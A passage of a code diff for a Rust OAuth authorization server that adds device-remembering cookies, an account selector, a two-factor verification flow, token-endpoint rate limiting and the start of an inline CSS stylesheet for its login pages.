        SELECT two_factor_enabled
        FROM users
        WHERE did = $1
        "#,
        did
    )
    .fetch_optional(pool)
    .await?;
    Ok(matches!(record, Some(r) if r.two_factor_enabled))
}

View File

@@ -1,15 +1,34 @@
use axum::{
Form, Json,
extract::{Query, State},
http::HeaderMap,
response::{IntoResponse, Redirect, Response},
http::{HeaderMap, header::SET_COOKIE},
response::{IntoResponse, Redirect, Response, Html},
};
use chrono::Utc;
use serde::{Deserialize, Serialize};
use subtle::ConstantTimeEq;
use urlencoding::encode as url_encode;
use crate::state::AppState;
use crate::oauth::{Code, DeviceData, DeviceId, OAuthError, SessionId, db};
use crate::oauth::{Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates};
use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code};
const DEVICE_COOKIE_NAME: &str = "oauth_device_id";
/// Extracts the device-identifier cookie value from the request headers.
///
/// Returns `None` when there is no `Cookie` header, it is not valid UTF-8,
/// or no `oauth_device_id` entry is present.
fn extract_device_cookie(headers: &HeaderMap) -> Option<String> {
    let cookie_header = headers.get("cookie")?.to_str().ok()?;
    // Build the "name=" prefix once instead of re-allocating it per cookie.
    let prefix = format!("{}=", DEVICE_COOKIE_NAME);
    cookie_header
        .split(';')
        .map(str::trim)
        .find_map(|cookie| cookie.strip_prefix(prefix.as_str()).map(str::to_string))
}
fn extract_client_ip(headers: &HeaderMap) -> String {
if let Some(forwarded) = headers.get("x-forwarded-for") {
@@ -36,10 +55,19 @@ fn extract_user_agent(headers: &HeaderMap) -> Option<String> {
.map(|s| s.to_string())
}
/// Builds the Set-Cookie value that pins the device id to the /oauth path
/// for one year (HttpOnly, Secure, SameSite=Lax).
fn make_device_cookie(device_id: &str) -> String {
    let attributes = "Path=/oauth; HttpOnly; Secure; SameSite=Lax; Max-Age=31536000";
    format!("{}={}; {}", DEVICE_COOKIE_NAME, device_id, attributes)
}
/// Query parameters accepted by GET /oauth/authorize.
#[derive(Debug, Deserialize)]
pub struct AuthorizeQuery {
    // PAR request_uri naming a pushed authorization request (required in practice).
    pub request_uri: Option<String>,
    // NOTE(review): not read by the visible handlers in this module — presumably
    // accepted for client compatibility; confirm before removing.
    pub client_id: Option<String>,
    // When true, skip the remembered-account selector and force a fresh login.
    pub new_account: Option<bool>,
}
#[derive(Debug, Serialize)]
@@ -61,7 +89,156 @@ pub struct AuthorizeSubmit {
pub remember_device: bool,
}
/// Form body for POST /oauth/authorize/select (remembered-account sign-in).
#[derive(Debug, Deserialize)]
pub struct AuthorizeSelectSubmit {
    pub request_uri: String,
    // DID of the remembered account chosen from the selector page.
    pub did: String,
}
/// True when the request's Accept header asks for application/json
/// (API consumers get JSON; browsers get HTML pages).
fn wants_json(headers: &HeaderMap) -> bool {
    headers
        .get("accept")
        .and_then(|v| v.to_str().ok())
        .map_or(false, |accept| accept.contains("application/json"))
}
/// GET /oauth/authorize — entry point of the interactive authorization flow.
///
/// Looks up the pushed authorization request (PAR) named by `request_uri`,
/// validates that it exists and has not expired, then renders either the
/// remembered-account selector (when the device cookie maps to known
/// accounts) or the login page. Requests with `Accept: application/json`
/// receive the request's parameters as JSON instead of HTML.
pub async fn authorize_get(
    State(state): State<AppState>,
    headers: HeaderMap,
    Query(query): Query<AuthorizeQuery>,
) -> Response {
    // A request_uri from a prior PAR call is mandatory; authorization
    // parameters cannot be passed directly on this endpoint.
    let request_uri = match query.request_uri {
        Some(uri) => uri,
        None => {
            if wants_json(&headers) {
                return (
                    axum::http::StatusCode::BAD_REQUEST,
                    Json(serde_json::json!({
                        "error": "invalid_request",
                        "error_description": "Missing request_uri parameter. Use PAR to initiate authorization."
                    })),
                ).into_response();
            }
            return (
                axum::http::StatusCode::BAD_REQUEST,
                Html(templates::error_page(
                    "invalid_request",
                    Some("Missing request_uri parameter. Use PAR to initiate authorization."),
                )),
            ).into_response();
        }
    };
    let request_data = match db::get_authorization_request(&state.db, &request_uri).await {
        Ok(Some(data)) => data,
        Ok(None) => {
            if wants_json(&headers) {
                return (
                    axum::http::StatusCode::BAD_REQUEST,
                    Json(serde_json::json!({
                        "error": "invalid_request",
                        "error_description": "Invalid or expired request_uri. Please start a new authorization request."
                    })),
                ).into_response();
            }
            return (
                axum::http::StatusCode::BAD_REQUEST,
                Html(templates::error_page(
                    "invalid_request",
                    Some("Invalid or expired request_uri. Please start a new authorization request."),
                )),
            ).into_response();
        }
        Err(e) => {
            if wants_json(&headers) {
                return (
                    axum::http::StatusCode::INTERNAL_SERVER_ERROR,
                    Json(serde_json::json!({
                        "error": "server_error",
                        "error_description": format!("Database error: {:?}", e)
                    })),
                ).into_response();
            }
            return (
                axum::http::StatusCode::INTERNAL_SERVER_ERROR,
                Html(templates::error_page(
                    "server_error",
                    Some(&format!("Database error: {:?}", e)),
                )),
            ).into_response();
        }
    };
    // Expired requests are deleted eagerly (best effort) and rejected.
    if request_data.expires_at < Utc::now() {
        let _ = db::delete_authorization_request(&state.db, &request_uri).await;
        if wants_json(&headers) {
            return (
                axum::http::StatusCode::BAD_REQUEST,
                Json(serde_json::json!({
                    "error": "invalid_request",
                    "error_description": "Authorization request has expired. Please start a new request."
                })),
            ).into_response();
        }
        return (
            axum::http::StatusCode::BAD_REQUEST,
            Html(templates::error_page(
                "invalid_request",
                Some("Authorization request has expired. Please start a new request."),
            )),
        ).into_response();
    }
    // JSON consumers get the request parameters back rather than a page.
    if wants_json(&headers) {
        return Json(AuthorizeResponse {
            client_id: request_data.parameters.client_id.clone(),
            client_name: None,
            scope: request_data.parameters.scope.clone(),
            redirect_uri: request_data.parameters.redirect_uri.clone(),
            state: request_data.parameters.state.clone(),
            login_hint: request_data.parameters.login_hint.clone(),
        }).into_response();
    }
    // `?new_account=true` bypasses the remembered-account selector.
    let force_new_account = query.new_account.unwrap_or(false);
    if !force_new_account {
        if let Some(device_id) = extract_device_cookie(&headers) {
            // Best effort: a DB error here simply falls through to the login page.
            if let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await {
                if !accounts.is_empty() {
                    let device_accounts: Vec<DeviceAccount> = accounts
                        .into_iter()
                        .map(|row| DeviceAccount {
                            did: row.did,
                            handle: row.handle,
                            email: row.email,
                            last_used_at: row.last_used_at,
                        })
                        .collect();
                    return Html(templates::account_selector_page(
                        &request_data.parameters.client_id,
                        None,
                        &request_uri,
                        &device_accounts,
                    )).into_response();
                }
            }
        }
    }
    Html(templates::login_page(
        &request_data.parameters.client_id,
        None,
        request_data.parameters.scope.as_deref(),
        &request_uri,
        None,
        request_data.parameters.login_hint.as_deref(),
    )).into_response()
}
pub async fn authorize_get_json(
State(state): State<AppState>,
Query(query): Query<AuthorizeQuery>,
) -> Result<Json<AuthorizeResponse>, OAuthError> {
@@ -92,19 +269,85 @@ pub async fn authorize_post(
State(state): State<AppState>,
headers: HeaderMap,
Form(form): Form<AuthorizeSubmit>,
) -> Result<Response, OAuthError> {
let request_data = db::get_authorization_request(&state.db, &form.request_uri)
.await?
.ok_or_else(|| OAuthError::InvalidRequest("Invalid or expired request_uri".to_string()))?;
) -> Response {
let json_response = wants_json(&headers);
let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
Ok(Some(data)) => data,
Ok(None) => {
if json_response {
return (
axum::http::StatusCode::BAD_REQUEST,
Json(serde_json::json!({
"error": "invalid_request",
"error_description": "Invalid or expired request_uri."
})),
).into_response();
}
return Html(templates::error_page(
"invalid_request",
Some("Invalid or expired request_uri. Please start a new authorization request."),
)).into_response();
}
Err(e) => {
if json_response {
return (
axum::http::StatusCode::INTERNAL_SERVER_ERROR,
Json(serde_json::json!({
"error": "server_error",
"error_description": format!("Database error: {:?}", e)
})),
).into_response();
}
return Html(templates::error_page(
"server_error",
Some(&format!("Database error: {:?}", e)),
)).into_response();
}
};
if request_data.expires_at < Utc::now() {
db::delete_authorization_request(&state.db, &form.request_uri).await?;
return Err(OAuthError::InvalidRequest("request_uri has expired".to_string()));
let _ = db::delete_authorization_request(&state.db, &form.request_uri).await;
if json_response {
return (
axum::http::StatusCode::BAD_REQUEST,
Json(serde_json::json!({
"error": "invalid_request",
"error_description": "Authorization request has expired."
})),
).into_response();
}
return Html(templates::error_page(
"invalid_request",
Some("Authorization request has expired. Please start a new request."),
)).into_response();
}
let user = sqlx::query!(
let show_login_error = |error_msg: &str, json: bool| -> Response {
if json {
return (
axum::http::StatusCode::FORBIDDEN,
Json(serde_json::json!({
"error": "access_denied",
"error_description": error_msg
})),
).into_response();
}
Html(templates::login_page(
&request_data.parameters.client_id,
None,
request_data.parameters.scope.as_deref(),
&form.request_uri,
Some(error_msg),
Some(&form.username),
)).into_response()
};
let user = match sqlx::query!(
r#"
SELECT did, password_hash, deactivated_at, takedown_ref
SELECT id, did, email, password_hash, two_factor_enabled,
preferred_notification_channel as "preferred_notification_channel: NotificationChannel",
deactivated_at, takedown_ref
FROM users
WHERE handle = $1 OR email = $1
"#,
@@ -112,65 +355,277 @@ pub async fn authorize_post(
)
.fetch_optional(&state.db)
.await
.map_err(|e| OAuthError::ServerError(e.to_string()))?
.ok_or_else(|| OAuthError::AccessDenied("Invalid credentials".to_string()))?;
{
Ok(Some(u)) => u,
Ok(None) => return show_login_error("Invalid handle/email or password.", json_response),
Err(_) => return show_login_error("An error occurred. Please try again.", json_response),
};
if user.deactivated_at.is_some() {
return Err(OAuthError::AccessDenied("Account is deactivated".to_string()));
return show_login_error("This account has been deactivated.", json_response);
}
if user.takedown_ref.is_some() {
return Err(OAuthError::AccessDenied("Account is taken down".to_string()));
return show_login_error("This account has been taken down.", json_response);
}
let password_valid = bcrypt::verify(&form.password, &user.password_hash)
.map_err(|_| OAuthError::ServerError("Password verification failed".to_string()))?;
let password_valid = match bcrypt::verify(&form.password, &user.password_hash) {
Ok(valid) => valid,
Err(_) => return show_login_error("An error occurred. Please try again.", json_response),
};
if !password_valid {
return Err(OAuthError::AccessDenied("Invalid credentials".to_string()));
return show_login_error("Invalid handle/email or password.", json_response);
}
if user.two_factor_enabled {
let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await;
match db::create_2fa_challenge(&state.db, &user.did, &form.request_uri).await {
Ok(challenge) => {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
if let Err(e) = enqueue_2fa_code(
&state.db,
user.id,
&challenge.code,
&hostname,
).await {
tracing::warn!(
did = %user.did,
error = %e,
"Failed to enqueue 2FA notification"
);
}
let channel_name = channel_display_name(user.preferred_notification_channel);
let redirect_url = format!(
"/oauth/authorize/2fa?request_uri={}&channel={}",
url_encode(&form.request_uri),
url_encode(channel_name)
);
return Redirect::temporary(&redirect_url).into_response();
}
Err(_) => {
return show_login_error("An error occurred. Please try again.", json_response);
}
}
}
let code = Code::generate();
let mut device_id: Option<String> = None;
let mut device_id: Option<String> = extract_device_cookie(&headers);
let mut new_cookie: Option<String> = None;
if form.remember_device {
let new_device_id = DeviceId::generate();
let device_data = DeviceData {
session_id: SessionId::generate().0,
user_agent: extract_user_agent(&headers),
ip_address: extract_client_ip(&headers),
last_seen_at: Utc::now(),
let final_device_id = if let Some(existing_id) = &device_id {
existing_id.clone()
} else {
let new_id = DeviceId::generate();
let device_data = DeviceData {
session_id: SessionId::generate().0,
user_agent: extract_user_agent(&headers),
ip_address: extract_client_ip(&headers),
last_seen_at: Utc::now(),
};
if db::create_device(&state.db, &new_id.0, &device_data).await.is_ok() {
new_cookie = Some(make_device_cookie(&new_id.0));
device_id = Some(new_id.0.clone());
}
new_id.0
};
db::create_device(&state.db, &new_device_id.0, &device_data).await?;
db::upsert_account_device(&state.db, &user.did, &new_device_id.0).await?;
device_id = Some(new_device_id.0);
let _ = db::upsert_account_device(&state.db, &user.did, &final_device_id).await;
}
db::update_authorization_request(
if let Err(_) = db::update_authorization_request(
&state.db,
&form.request_uri,
&user.did,
device_id.as_deref(),
&code.0,
)
.await?;
.await
{
return show_login_error("An error occurred. Please try again.", json_response);
}
let redirect_uri = &request_data.parameters.redirect_uri;
let redirect_url = build_success_redirect(
&request_data.parameters.redirect_uri,
&code.0,
request_data.parameters.state.as_deref(),
);
let redirect = Redirect::temporary(&redirect_url);
if let Some(cookie) = new_cookie {
([(SET_COOKIE, cookie)], redirect).into_response()
} else {
redirect.into_response()
}
}
/// POST /oauth/authorize/select — continue authorization as a remembered account.
///
/// The account must already be linked to the device identified by the device
/// cookie; password re-entry is skipped, but 2FA (when enabled for the user)
/// is still enforced before the authorization code is issued.
pub async fn authorize_select(
    State(state): State<AppState>,
    headers: HeaderMap,
    Form(form): Form<AuthorizeSelectSubmit>,
) -> Response {
    let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
        Ok(Some(data)) => data,
        Ok(None) => {
            return Html(templates::error_page(
                "invalid_request",
                Some("Invalid or expired request_uri. Please start a new authorization request."),
            )).into_response();
        }
        Err(_) => {
            return Html(templates::error_page(
                "server_error",
                Some("An error occurred. Please try again."),
            )).into_response();
        }
    };
    if request_data.expires_at < Utc::now() {
        // Best-effort cleanup of the expired request.
        let _ = db::delete_authorization_request(&state.db, &form.request_uri).await;
        return Html(templates::error_page(
            "invalid_request",
            Some("Authorization request has expired. Please start a new request."),
        )).into_response();
    }
    // Without a device cookie there is no trusted account list to select from.
    let device_id = match extract_device_cookie(&headers) {
        Some(id) => id,
        None => {
            return Html(templates::error_page(
                "invalid_request",
                Some("No device session found. Please sign in."),
            )).into_response();
        }
    };
    // The submitted DID must actually be linked to this device — prevents
    // authorizing arbitrary accounts by forging the form field.
    let account_valid = match db::verify_account_on_device(&state.db, &device_id, &form.did).await {
        Ok(valid) => valid,
        Err(_) => {
            return Html(templates::error_page(
                "server_error",
                Some("An error occurred. Please try again."),
            )).into_response();
        }
    };
    if !account_valid {
        return Html(templates::error_page(
            "access_denied",
            Some("This account is not available on this device. Please sign in."),
        )).into_response();
    }
    let user = match sqlx::query!(
        r#"
        SELECT id, two_factor_enabled,
        preferred_notification_channel as "preferred_notification_channel: NotificationChannel"
        FROM users
        WHERE did = $1
        "#,
        form.did
    )
    .fetch_optional(&state.db)
    .await
    {
        Ok(Some(u)) => u,
        Ok(None) => {
            return Html(templates::error_page(
                "access_denied",
                Some("Account not found. Please sign in."),
            )).into_response();
        }
        Err(_) => {
            return Html(templates::error_page(
                "server_error",
                Some("An error occurred. Please try again."),
            )).into_response();
        }
    };
    // 2FA: replace any stale challenge, send a fresh code over the user's
    // preferred channel, and divert to the code-entry page.
    if user.two_factor_enabled {
        let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await;
        match db::create_2fa_challenge(&state.db, &form.did, &form.request_uri).await {
            Ok(challenge) => {
                let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
                // Delivery failure is logged but does not abort the flow.
                if let Err(e) = enqueue_2fa_code(
                    &state.db,
                    user.id,
                    &challenge.code,
                    &hostname,
                ).await {
                    tracing::warn!(
                        did = %form.did,
                        error = %e,
                        "Failed to enqueue 2FA notification"
                    );
                }
                let channel_name = channel_display_name(user.preferred_notification_channel);
                let redirect_url = format!(
                    "/oauth/authorize/2fa?request_uri={}&channel={}",
                    url_encode(&form.request_uri),
                    url_encode(channel_name)
                );
                return Redirect::temporary(&redirect_url).into_response();
            }
            Err(_) => {
                return Html(templates::error_page(
                    "server_error",
                    Some("An error occurred. Please try again."),
                )).into_response();
            }
        }
    }
    // Refresh the account/device link timestamp (best effort).
    let _ = db::upsert_account_device(&state.db, &form.did, &device_id).await;
    let code = Code::generate();
    if let Err(_) = db::update_authorization_request(
        &state.db,
        &form.request_uri,
        &form.did,
        Some(&device_id),
        &code.0,
    )
    .await
    {
        return Html(templates::error_page(
            "server_error",
            Some("An error occurred. Please try again."),
        )).into_response();
    }
    let redirect_url = build_success_redirect(
        &request_data.parameters.redirect_uri,
        &code.0,
        request_data.parameters.state.as_deref(),
    );
    Redirect::temporary(&redirect_url).into_response()
}
fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String {
let mut redirect_url = redirect_uri.to_string();
let separator = if redirect_url.contains('?') { '&' } else { '?' };
redirect_url.push(separator);
redirect_url.push_str(&format!("code={}", url_encode(&code.0)));
redirect_url.push_str(&format!("code={}", url_encode(code)));
if let Some(state) = &request_data.parameters.state {
redirect_url.push_str(&format!("&state={}", url_encode(state)));
if let Some(req_state) = state {
redirect_url.push_str(&format!("&state={}", url_encode(req_state)));
}
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
redirect_url.push_str(&format!("&iss={}", url_encode(&format!("https://{}", pds_hostname))));
Ok(Redirect::temporary(&redirect_url).into_response())
redirect_url
}
#[derive(Debug, Serialize)]
@@ -208,3 +663,191 @@ pub async fn authorize_deny(
pub struct AuthorizeDenyForm {
pub request_uri: String,
}
/// Query parameters for GET /oauth/authorize/2fa.
#[derive(Debug, Deserialize)]
pub struct Authorize2faQuery {
    pub request_uri: String,
    // Display name of the channel the code was sent over (e.g. "email").
    pub channel: Option<String>,
}
/// Form body for POST /oauth/authorize/2fa.
#[derive(Debug, Deserialize)]
pub struct Authorize2faSubmit {
    pub request_uri: String,
    // The verification code the user received.
    pub code: String,
}
// Maximum failed code entries before the challenge is invalidated.
const MAX_2FA_ATTEMPTS: i32 = 5;
/// GET /oauth/authorize/2fa — renders the verification-code entry page.
///
/// Requires both a live 2FA challenge and a live authorization request for
/// the given request_uri; otherwise an error page is shown.
pub async fn authorize_2fa_get(
    State(state): State<AppState>,
    Query(query): Query<Authorize2faQuery>,
) -> Response {
    let challenge = match db::get_2fa_challenge(&state.db, &query.request_uri).await {
        Ok(Some(c)) => c,
        Ok(None) => {
            return Html(templates::error_page(
                "invalid_request",
                Some("No 2FA challenge found. Please start over."),
            )).into_response();
        }
        Err(_) => {
            return Html(templates::error_page(
                "server_error",
                Some("An error occurred. Please try again."),
            )).into_response();
        }
    };
    if challenge.expires_at < Utc::now() {
        // Best-effort cleanup of the expired challenge.
        let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
        return Html(templates::error_page(
            "invalid_request",
            Some("2FA code has expired. Please start over."),
        )).into_response();
    }
    // Fetched only to confirm the authorization request still exists.
    let _request_data = match db::get_authorization_request(&state.db, &query.request_uri).await {
        Ok(Some(d)) => d,
        Ok(None) => {
            return Html(templates::error_page(
                "invalid_request",
                Some("Authorization request not found. Please start over."),
            )).into_response();
        }
        Err(_) => {
            return Html(templates::error_page(
                "server_error",
                Some("An error occurred. Please try again."),
            )).into_response();
        }
    };
    // Channel name is display-only; default to "email" when absent.
    let channel = query.channel.as_deref().unwrap_or("email");
    Html(templates::two_factor_page(
        &query.request_uri,
        channel,
        None,
    )).into_response()
}
/// POST /oauth/authorize/2fa — verifies the submitted one-time code.
///
/// On success the challenge is consumed, the authorization request is bound
/// to the challenged user, and the browser is redirected back to the client
/// with an authorization code. Wrong codes re-render the entry page until
/// MAX_2FA_ATTEMPTS failures accumulate, after which the challenge is destroyed.
pub async fn authorize_2fa_post(
    State(state): State<AppState>,
    headers: HeaderMap,
    Form(form): Form<Authorize2faSubmit>,
) -> Response {
    let challenge = match db::get_2fa_challenge(&state.db, &form.request_uri).await {
        Ok(Some(c)) => c,
        Ok(None) => {
            return Html(templates::error_page(
                "invalid_request",
                Some("No 2FA challenge found. Please start over."),
            )).into_response();
        }
        Err(_) => {
            return Html(templates::error_page(
                "server_error",
                Some("An error occurred. Please try again."),
            )).into_response();
        }
    };
    if challenge.expires_at < Utc::now() {
        let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
        return Html(templates::error_page(
            "invalid_request",
            Some("2FA code has expired. Please start over."),
        )).into_response();
    }
    // Lock out after too many failures by destroying the challenge entirely.
    if challenge.attempts >= MAX_2FA_ATTEMPTS {
        let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
        return Html(templates::error_page(
            "access_denied",
            Some("Too many failed attempts. Please start over."),
        )).into_response();
    }
    // Constant-time comparison (subtle::ConstantTimeEq) to avoid leaking the
    // code through timing differences.
    let code_valid: bool = form.code.trim().as_bytes().ct_eq(challenge.code.as_bytes()).into();
    if !code_valid {
        let _ = db::increment_2fa_attempts(&state.db, challenge.id).await;
        // Re-resolve the user's channel name purely for page display.
        let channel = match sqlx::query_scalar!(
            r#"SELECT preferred_notification_channel as "channel: NotificationChannel" FROM users WHERE did = $1"#,
            challenge.did
        )
        .fetch_optional(&state.db)
        .await
        {
            Ok(Some(ch)) => channel_display_name(ch).to_string(),
            Ok(None) | Err(_) => "email".to_string(),
        };
        // Confirm the authorization request is still alive before re-prompting.
        let _request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
            Ok(Some(d)) => d,
            Ok(None) => {
                return Html(templates::error_page(
                    "invalid_request",
                    Some("Authorization request not found. Please start over."),
                )).into_response();
            }
            Err(_) => {
                return Html(templates::error_page(
                    "server_error",
                    Some("An error occurred. Please try again."),
                )).into_response();
            }
        };
        return Html(templates::two_factor_page(
            &form.request_uri,
            &channel,
            Some("Invalid verification code. Please try again."),
        )).into_response();
    }
    // Success: the challenge is single-use.
    let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
    let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
        Ok(Some(d)) => d,
        Ok(None) => {
            return Html(templates::error_page(
                "invalid_request",
                Some("Authorization request not found."),
            )).into_response();
        }
        Err(_) => {
            return Html(templates::error_page(
                "server_error",
                Some("An error occurred."),
            )).into_response();
        }
    };
    let code = Code::generate();
    let device_id = extract_device_cookie(&headers);
    if let Err(_) = db::update_authorization_request(
        &state.db,
        &form.request_uri,
        &challenge.did,
        device_id.as_deref(),
        &code.0,
    )
    .await
    {
        return Html(templates::error_page(
            "server_error",
            Some("An error occurred. Please try again."),
        )).into_response();
    }
    let redirect_url = build_success_redirect(
        &request_data.parameters.redirect_uri,
        &code.0,
        request_data.parameters.state.as_deref(),
    );
    Redirect::temporary(&redirect_url).into_response()
}

View File

@@ -54,7 +54,7 @@ pub async fn handle_authorization_code_grant(
.get(&auth_request.client_id)
.await?;
let client_auth = auth_request.client_auth.clone().unwrap_or(ClientAuth::None);
verify_client_auth(&client_metadata, &client_auth)?;
verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?;
verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?;

View File

@@ -19,11 +19,35 @@ pub use introspect::{
};
pub use types::{TokenRequest, TokenResponse};
/// Best-effort client IP for rate limiting: first hop of `x-forwarded-for`,
/// then `x-real-ip`, falling back to "unknown".
fn extract_client_ip(headers: &HeaderMap) -> String {
    let forwarded = headers
        .get("x-forwarded-for")
        .and_then(|v| v.to_str().ok())
        .and_then(|v| v.split(',').next())
        .map(|ip| ip.trim().to_string());
    if let Some(ip) = forwarded {
        return ip;
    }
    headers
        .get("x-real-ip")
        .and_then(|v| v.to_str().ok())
        .map(|v| v.trim().to_string())
        .unwrap_or_else(|| "unknown".to_string())
}
pub async fn token_endpoint(
State(state): State<AppState>,
headers: HeaderMap,
Form(request): Form<TokenRequest>,
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
let client_ip = extract_client_ip(&headers);
if state.rate_limiters.oauth_token.check_key(&client_ip).is_err() {
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
return Err(OAuthError::InvalidRequest(
"Too many requests. Please try again later.".to_string(),
));
}
let dpop_proof = headers
.get("DPoP")
.and_then(|v| v.to_str().ok())

View File

@@ -5,8 +5,10 @@ pub mod jwks;
pub mod client;
pub mod endpoints;
pub mod error;
pub mod templates;
pub mod verify;
pub use types::*;
pub use error::OAuthError;
pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
pub use templates::{DeviceAccount, mask_email};

719
src/oauth/templates.rs Normal file
View File

@@ -0,0 +1,719 @@
use chrono::{DateTime, Utc};
/// Shared stylesheet for every server-rendered OAuth page (login, account
/// selector, 2FA, error, success).
///
/// Each page template inlines this into a `<style>` tag, so the pages are
/// fully self-contained (no external asset requests during the auth flow).
/// Colors are defined as CSS custom properties on `:root`, with a
/// dark-mode override via `prefers-color-scheme`.
fn base_styles() -> &'static str {
    r#"
:root {
    --primary: #0085ff;
    --primary-hover: #0077e6;
    --primary-contrast: #ffffff;
    --primary-100: #dbeafe;
    --primary-400: #60a5fa;
    --primary-600-30: rgba(37, 99, 235, 0.3);
    --contrast-0: #ffffff;
    --contrast-25: #f8f9fa;
    --contrast-50: #f1f3f5;
    --contrast-100: #e9ecef;
    --contrast-200: #dee2e6;
    --contrast-300: #ced4da;
    --contrast-400: #adb5bd;
    --contrast-500: #6b7280;
    --contrast-600: #4b5563;
    --contrast-700: #374151;
    --contrast-800: #1f2937;
    --contrast-900: #111827;
    --error: #dc2626;
    --error-bg: #fef2f2;
    --success: #059669;
    --success-bg: #ecfdf5;
}
@media (prefers-color-scheme: dark) {
    :root {
        --contrast-0: #111827;
        --contrast-25: #1f2937;
        --contrast-50: #374151;
        --contrast-100: #4b5563;
        --contrast-200: #6b7280;
        --contrast-300: #9ca3af;
        --contrast-400: #d1d5db;
        --contrast-500: #e5e7eb;
        --contrast-600: #f3f4f6;
        --contrast-700: #f9fafb;
        --contrast-800: #ffffff;
        --contrast-900: #ffffff;
        --error-bg: #451a1a;
        --success-bg: #064e3b;
    }
}
* {
    box-sizing: border-box;
    margin: 0;
    padding: 0;
}
body {
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
    background: var(--contrast-50);
    color: var(--contrast-900);
    min-height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 1rem;
    line-height: 1.5;
}
.container {
    width: 100%;
    max-width: 400px;
    padding-top: 15vh;
}
@media (max-width: 640px) {
    .container {
        padding-top: 2rem;
    }
}
.card {
    background: var(--contrast-0);
    border: 1px solid var(--contrast-100);
    border-radius: 0.75rem;
    padding: 1.5rem;
    box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.1), 0 8px 10px -6px rgba(0, 0, 0, 0.1);
}
@media (prefers-color-scheme: dark) {
    .card {
        box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.4), 0 8px 10px -6px rgba(0, 0, 0, 0.3);
    }
}
h1 {
    font-size: 1.5rem;
    font-weight: 600;
    color: var(--contrast-900);
    margin-bottom: 0.5rem;
}
.subtitle {
    color: var(--contrast-500);
    font-size: 0.875rem;
    margin-bottom: 1.5rem;
}
.subtitle strong {
    color: var(--contrast-700);
}
.client-info {
    background: var(--contrast-25);
    border-radius: 0.5rem;
    padding: 1rem;
    margin-bottom: 1.5rem;
}
.client-info .client-name {
    font-weight: 500;
    color: var(--contrast-900);
    display: block;
    margin-bottom: 0.25rem;
}
.client-info .scope {
    color: var(--contrast-500);
    font-size: 0.875rem;
}
.error-banner {
    background: var(--error-bg);
    color: var(--error);
    border-radius: 0.5rem;
    padding: 0.75rem 1rem;
    margin-bottom: 1rem;
    font-size: 0.875rem;
}
.form-group {
    margin-bottom: 1.25rem;
}
label {
    display: block;
    font-size: 0.875rem;
    font-weight: 500;
    color: var(--contrast-700);
    margin-bottom: 0.375rem;
}
input[type="text"],
input[type="email"],
input[type="password"] {
    width: 100%;
    padding: 0.625rem 0.875rem;
    border: 2px solid var(--contrast-200);
    border-radius: 0.375rem;
    font-size: 1rem;
    color: var(--contrast-900);
    background: var(--contrast-0);
    transition: border-color 0.15s, box-shadow 0.15s;
}
input[type="text"]:focus,
input[type="email"]:focus,
input[type="password"]:focus {
    outline: none;
    border-color: var(--primary);
    box-shadow: 0 0 0 3px var(--primary-600-30);
}
input[type="text"]::placeholder,
input[type="email"]::placeholder,
input[type="password"]::placeholder {
    color: var(--contrast-400);
}
.checkbox-group {
    display: flex;
    align-items: center;
    gap: 0.5rem;
    margin-bottom: 1.5rem;
}
.checkbox-group input[type="checkbox"] {
    width: 1.125rem;
    height: 1.125rem;
    accent-color: var(--primary);
}
.checkbox-group label {
    margin-bottom: 0;
    font-weight: normal;
    color: var(--contrast-600);
    cursor: pointer;
}
.buttons {
    display: flex;
    gap: 0.75rem;
}
.btn {
    flex: 1;
    padding: 0.625rem 1.25rem;
    border-radius: 0.375rem;
    font-size: 1rem;
    font-weight: 500;
    cursor: pointer;
    transition: background-color 0.15s, transform 0.1s;
    border: none;
    text-align: center;
    text-decoration: none;
    display: inline-flex;
    align-items: center;
    justify-content: center;
}
.btn:active {
    transform: scale(0.98);
}
.btn-primary {
    background: var(--primary);
    color: var(--primary-contrast);
}
.btn-primary:hover {
    background: var(--primary-hover);
}
.btn-primary:disabled {
    background: var(--primary-400);
    cursor: not-allowed;
}
.btn-secondary {
    background: var(--contrast-500);
    color: white;
}
.btn-secondary:hover {
    background: var(--contrast-600);
}
.footer {
    text-align: center;
    margin-top: 1.5rem;
    font-size: 0.75rem;
    color: var(--contrast-400);
}
.accounts {
    display: flex;
    flex-direction: column;
    gap: 0.5rem;
    margin-bottom: 1rem;
}
.account-item {
    display: flex;
    align-items: center;
    gap: 0.75rem;
    width: 100%;
    padding: 0.75rem;
    background: var(--contrast-25);
    border: 1px solid var(--contrast-100);
    border-radius: 0.5rem;
    cursor: pointer;
    transition: background-color 0.15s, border-color 0.15s;
    text-align: left;
}
.account-item:hover {
    background: var(--contrast-50);
    border-color: var(--contrast-200);
}
.avatar {
    width: 2.5rem;
    height: 2.5rem;
    border-radius: 50%;
    background: var(--primary);
    color: var(--primary-contrast);
    display: flex;
    align-items: center;
    justify-content: center;
    font-weight: 600;
    font-size: 0.875rem;
    flex-shrink: 0;
}
.account-info {
    flex: 1;
    min-width: 0;
}
.account-info .handle {
    display: block;
    font-weight: 500;
    color: var(--contrast-900);
    overflow: hidden;
